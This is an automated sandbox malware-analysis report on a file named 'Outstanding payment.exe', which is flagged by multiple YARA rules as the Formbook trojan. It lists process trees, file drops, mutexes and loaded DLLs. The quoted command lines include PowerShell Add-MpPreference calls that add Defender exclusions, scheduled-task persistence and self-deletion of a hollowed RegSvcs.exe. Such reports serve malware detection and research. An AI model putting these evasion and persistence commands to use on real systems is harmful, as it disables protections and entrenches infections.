Source: Outstanding payment.exe, 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Outstanding payment.exe
Source: Outstanding payment.exe	Binary or memory string: OriginalFilenameVlWL.exe" vs Outstanding payment.exe

Source: Outstanding payment.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Outstanding payment.exe.4234148.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2149315222.0000000004301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.2169396425.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.4526105305.0000000002AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.4544744783.00000000118C5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2162392386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2114082596.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.4526496675.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.4525873730.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2149315222.00000000044A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2114082596.000000000446F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Outstanding payment.exe PID: 6252, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: iBSWjb.exe PID: 6648, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 6564, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msiexec.exe PID: 3876, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 4676, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Outstanding payment.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: iBSWjb.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@26/15@11/0

Source: C:\Users\user\Desktop\Outstanding payment.exe

File created: C:\Users\user\AppData\Roaming\iBSWjb.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Mutant created: \Sessions\1\BaseNamedObjects\iGAQEIWfdLpPOyg
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03

Source: C:\Users\user\Desktop\Outstanding payment.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp

Jump to behavior

Source: Outstanding payment.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Outstanding payment.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Outstanding payment.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Outstanding payment.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Outstanding payment.exe	ReversingLabs: Detection: 28%
Source: Outstanding payment.exe	Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\Outstanding payment.exe

File read: C:\Users\user\Desktop\Outstanding payment.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Outstanding payment.exe "C:\Users\user\Desktop\Outstanding payment.exe"
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iBSWjb.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\iBSWjb.exe C:\Users\user\AppData\Roaming\iBSWjb.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpF30F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iBSWjb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpF30F.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Section loaded: ntmarta.dll	Jump to behavior
